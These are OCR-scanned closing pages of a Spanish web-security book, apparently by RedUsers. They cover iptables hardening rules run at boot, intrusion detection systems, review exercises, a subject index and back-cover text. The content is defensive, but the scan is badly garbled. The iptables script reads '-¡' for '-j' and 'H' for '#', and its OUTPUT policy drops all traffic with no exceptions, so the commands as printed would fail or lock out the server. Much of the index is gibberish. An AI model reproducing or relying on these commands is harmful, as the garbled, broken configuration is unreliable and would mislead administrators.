tcp 235.34.104.11 anyuhere dpt :mysql 
tcp anyuhere anyuhere dpts :tcpmu 


udp anyuhere anyuhere dpts:1:655 


hain FORYARD (policy ACCEPT) 


Figura 19. Definimos reglas útiles para el firewall iptables. 


Inicio automático 


Es importante saber que las reglas de iptables no se almacenan en 
ningún archivo, sino que se guardan en la memoria. Si el servidor se 
reinicia, perderemos todas las reglas que hemos definido. Volver a 
escribirlas de nuevo cada vez que reiniciemos sería demasiado tedioso. 
Para evitarlo, podemos crear un script bash con todas nuestras reglas 
e indicarle al servidor que debe ejecutarlo cada vez que se inicia. 

A continuación mostraremos una manera de hacerlo. 
Creamos un script bash con las reglas para iptables, por ejemplo: 


4t!/bin/bash 


HPoliticas por defecto. 
iptables -P INPUT DROP 
iptables -P OUTPUT DROP 
iptables -P FORWARD DROP 


H+Definimos que el puerto 80 (TCP) acepta conexiones. 
iptables -A INPUT -p tcp --dport 80 -¡ ACCEPT 
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HPermitimos a la IP 192.168.0.102 conectarse al servidor por SSH. 
iptables -A INPUT -s 192.168.0.102 -p tcp --dport 22 -j¡ ACCEPT 


HPermitimos a un FTP con IP 192.168.0.105 conectarse al servidor. 
iptables -A INPUT -s 192.168.0.105 -p tcp --dport 21 -¡ ACCEPT 


H+Permitimos a la IP 235.34.104.11 conectarse al servidor por el puerto 3306. 
iptables -A INPUT -s 235.34.104.11 -p tcp --dport 3306 -¡ACCEPT 


HRechazamos todas las demás conexiones entrantes por TCP y UDP 
iptables -A INPUT -p tcp --dport 1:65535 -j¡ DROP 
iptables -A INPUT -p udp --dport 1:65535 -¡ DROP 


Lo guardamos dentro del directorio /etc/init.d, bajo el nombre 
que queramos (por ejemplo, iptables-reglas), y le damos permisos de 
ejecución: chmod 750 /etc/init.d/iptables-reglas. Por último, indicamos al 
sistema operativo que lo ejecute cada vez que se inicia: update-rc.d 
iptables-reglas defaults. 


Sistemas de detección 
de intrusos 


Una excelente medida de seguridad es implementar un IDS (Intrusion 
Detection System), para detectar un posible ataque al sistema y alertar 
al administrador mediante un mail o mensaje de texto. Para realizar la 
detección utiliza diversas técnicas, entre ellas, el reconocimiento de 
firmas: similar al antivirus, posee una base de datos con firmas que 
identifican comportamientos típicos de un ataque y, al identificarse 
uno o más de estos patrones, se dispara la alerta. 

Otra técnica utilizada para detectar un ataque consiste en analizar la 
información del sistema monitoreado en busca de anomalías, y alertar 
al administrador en caso de hallarlas. Las demás técnicas dependerán 
de cómo trabaje el IDS, ya que existen dos clases: HIDS (Host IDS) 

y NIDS (Network IDS), de host y red respectivamente. 
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Cabe aclarar que un IDS no es capaz de detener un ataque por sí solo, 
por lo cual suele estar integrado con un firewall. De este modo se logra 
unir la capacidad de bloqueo de los firewalls con la inteligencia del IDS. 


Detección a nivel host 


Los HIDS trabajan en forma local y monitorean el sistema 
operativo en busca de anomalías que indiquen un posible ataque. 
Pueden analizar el contenido de la memoria RAM, eventos y logs, 
cambios realizados sobre archivos importantes del sistema, intentos 
de acceso a la base de datos de usuarios y contraseñas, entre otras 
acciones. Algunas aplicaciones de este tipo son: OSSEC (Open Source 
SECurity), AIDE (Advanced Intrusion Detection Environment), Osiris 
y LIDS (Linux IDS). 


Detección a nivel red 


Los NIDS monitorean la red en tiempo real con el objetivo de 
identificar un posible ataque. Además del reconocimiento de firmas y la 
evaluación general del comportamiento de la red, analizan los paquetes 
TCP/IP con contenido extraño o evidentemente creado para otro fin, lo 
cual podría indicar una actividad previa al ataque (que podría tratarse, 
por ejemplo, de un escaneo de puertos). 

Dependiendo del lugar de la red donde estén ubicados, los NIDS 
bien configurados analizan el tráfico entrante, saliente y local, siendo 
capaces de detectar una gran variedad de ataques (como por ejemplo, 
intentos de denegación de servicio DoS/DDOS e intrusiones al sistema). 


ma RESUMEN 


Este capítulo es de suma importancia para la protección de nuestros servidores. Aprendimos diversas téc- 
nicas de hardening, empezando por eliminar riesgos que pueden producirse al utilizar el lenguaje PHP. 
Instalamos un sistema de protección avanzado, Suhosin, y un firewall de aplicaciones web, Mod_Security. 
Para complementar aún más estas medidas de protección aprendimos a instalar los cortafuegos iptables y a 
crear reglas de utilidad. Por último, conocimos el funcionamiento de los sistemas de detección de intrusos. 


www.detodoprogramacion.com www.redusers.com < 


314 (a 10. SEGURIDAD EN EL SERVIDOR 


Actividades 


TEST DE AUTOEVALUACIÓN 


1] ¿Cuáles son las medidas de protección básicas para un servidor web? 
2 ¿Qué funciones PHP deberíamos deshabilitar? 


3 ¿Qué vulnerabilidad podemos evitar si asignamos un valor a la directiva 
open_basedir en php.ini? 


4 ¿Por qué es importante que eliminemos los archivos temporales? 
5 ¿Para qué sirve Suhosin? 


6 ¿Cuál es la diferencia entre un firewall tradicional y un firewall de aplicaciones 
web? 


EJERCICIOS PRÁCTICOS 


1] Edite el archivo php.ini de su servidor web y deshabilite las funciones PHP 
que puedan envolver algún peligro. 


2 Limite el directorio de trabajo de PHP, indicándolo mediante la directiva 
open_basedir en el archivo php.ini. 


3 Instale Suhosin en su servidor web. 
4 Instale el WAF Mod_Security en su instalación de Apache. 


5  Implemente un IDS (Intrusion Detection System) para detectar un posible ata- 
que al sistema. 


hs PROFESOR EN LÍNEA 


Si tiene alguna consulta técnica relacionada con el contenido, puede contactarse 
con nuestros expertos: profesorOredusers.com 
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A continuación presentamos un índice temático que nos será 
de gran ayuda a la hora de buscar información en este manual, 


de manera rápida y precisa. 
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Índice temático 
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Cabecera Most across 90 
2000 104 Cabecera See unica 109 
o A 104 Cabeceras (headers) ..........o.ocoomoomomo.. 88, 101 
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A enn 106 CNAME (Canonical Name)......................... 69 
ADVANCE QUO crisis 106 COMPUADOE SEC rarrerócnenrinióna cria 53 
405 Method Not Allowed .......................... 107 EA A: 45, 46, 51 
500 Internal Server Error......................... 108 Contras ici 28-31, 148, 258 
505 HTTP Version Not Supported ............ 108 CookKle pOlSONNO cia 162 
COOK 128, 160, 164 
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Apache Software Foundation ................. 85-86 Cross-Site Scripting .................. 116, 119, 168 
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Archivo Host acia 49 DBMS (Database Management System) .. 245 
ASP (Active Server Pages)....................... 200 DEMSNErárQUICOS.. mirar 248 
BIRF Riiie 72-75, 80 DBMS relacional .........ocococioonoononomonommomom. 246 
DDL (Data Definition Language) .............. 248 
A A OT 61-62, 72, 80 Dei 299 
A 36 Delia 16, 18, 20 
Banner GrADDMO isis ria 108 0 oe € 61, 64, 73 
Nas 311 Directory TransverSal.....o.ooocccnoninnmmmmmmm... 293 
BINDO scsi 52,59 DML (Data Manipulation Language) 248, 249 
Blake 18-19, 21 DNS AS 42-51 
Buffer DVErOW ce 301 DNS :Brutée Force occ 74d 
Burpgultena. nas. masisa man 162 DNS primario... ¿aimara mt... 43 
DNSSECUndariO e iimrsriresoicncsacpirisiinaa 44 
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Cabecera ÁCCePt .oooocococcnococcnnnononnranonnnoros 95-96 AS 72,81 
Cabecera Alisa canada 93 DNSRECON corria 79-80 
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DNSSEC (Domain Name System Security 
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AA 78 
DOM aaa 141 
Domain Dossier. ns 78 
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DOMO sir 47 
Dor. cananea 183 
DoS (Denial of Service) ..........ccocnnnnnonno. 133 
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03 104 explicaciones teóricas, procedimientos paso a paso, 
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» 25 Fascículos Curso para dominar las principales herramientas del paquete Adobe CS3 y 
» 600 Páginas conocer los mejores secretos para diseñar de manera profesional. Ideal para 
»2DVDs/2Libros quienes se desempeñan en diseño, publicidad, productos gráficos o sitios web. 
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2,4 CDs en el área, con infografías y explicaciones muy didácticas. 
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Esta obra brinda al lector la posibilidad de ubicarse en la mente de los hackers, para así conocer en profundidad sus técnicas. 

Los capítulos de este libro analizan las fallas de seguridad más frecuentes en aplicaciones web y cómo aprovechan los hackers las 
vulnerabilidades dentro del código. Se detallan los protocolos utilizados (HTTP y DNS) y se explica cómo llevar a cabo ataques del lado 
del cliente y manipular formularios. También se exponen los métodos usados para obtener el control total de un servidor web y realizar 
ataques a los gestores de bases de datos más importantes (como MySQL, Oracle Database y PostgreSQL). 

El lector podrá desarrollar códigos con las protecciones adecuadas e implementar medidas de seguridad en el interior de un servidor web. 


£ Para defenderse es necesario saber atacar. Identificar 
fallas en un código permite analizar cómo pueden ser no 
explotadas por un atacante y evaluar soluciones. 


Ye EN ESTE LIBRO APRENDERÁ: 


> Introducción a la seguridad informática: identificación de atacantes. Instalación 
de un servidor y aplicación de medidas básicas de protección. 


lo Servidores DNS y protocolo HTTP: instalación de DNS Bind9 y obtención de 
información mediante consultas a los registros. Instalación de un servidor HTTP A b La cea 
y uso de NetCat. : 


)> Cross-Site Attack y ataques del lado del cliente: evasión de filtros de datos y 3) Sheila Berta nació en 1994, 
e rd a , Se especializa en análisis de 
programación de una aplicación segura. Modificación de formularios para ver 


ur re y . malware y seguridad web. Ha 
campos ocultos y eliminar límites. Envenenamiento de cookies. encontrado fallas en impor- 


tantes aplicaciones, trabaja 
como instructora de seguridad 
informática y es programadora 
en C/C++, Python y PHP, entre 
otros lenguajes. 


lb Inclusión de archivos y ejecución remota: búsqueda de vulnerabilidades que 
permitan incluir archivos locales y remotos para tomar control del servidor web. 


lb Revelación de información y seguridad en el servidor: malas prácticas de confi- 
guración. Hardening e instalación de un firewall. Reglas para iptables y sistemas 
de detección de intrusos. 
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